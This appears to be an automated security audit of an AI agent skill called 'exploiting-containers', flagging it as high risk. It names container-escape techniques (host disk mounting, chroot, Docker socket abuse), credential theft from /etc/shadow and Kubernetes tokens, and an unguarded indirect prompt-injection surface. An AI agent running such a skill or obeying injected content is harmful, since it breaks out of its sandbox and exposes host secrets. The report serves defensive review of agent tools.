exploiting-containers
Fail
Audited by Gen Agent Trust Hub on Mar 21, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill downloads an external shell script (deepce.sh) from an unverified GitHub repository using wget and provides instructions to execute it with elevated permissions after modifying its execution bits.
- [COMMAND_EXECUTION]: Includes high-risk commands for escaping container environments, such as mounting host devices (mount /dev/sda1 /mnt/host), performing chroot operations to access the host filesystem, and abusing the Docker socket to create new privileged containers.
- [EXTERNAL_DOWNLOADS]: Fetches automated exploitation tools and performs network requests to external container registries and Kubernetes API servers to pull images or manifests from potentially untrusted sources.
- [DATA_EXFILTRATION]: Specifically targets sensitive credentials and files, including the host's /etc/shadow file, Kubernetes service account tokens, and encoded secrets stored within the cluster environment.
- [PROMPT_INJECTION]: The skill exhibits a significant surface for indirect prompt injection. Ingestion points: Kubernetes API responses, container logs, and image layer metadata (SKILL.md). Boundary markers: Absent. Capability inventory: Command execution (chroot, mount), file system access, and network requests (curl, wget). Sanitization: No validation or escaping of external content is implemented.
Recommendations
- AI detected serious security threats
Audit Metadata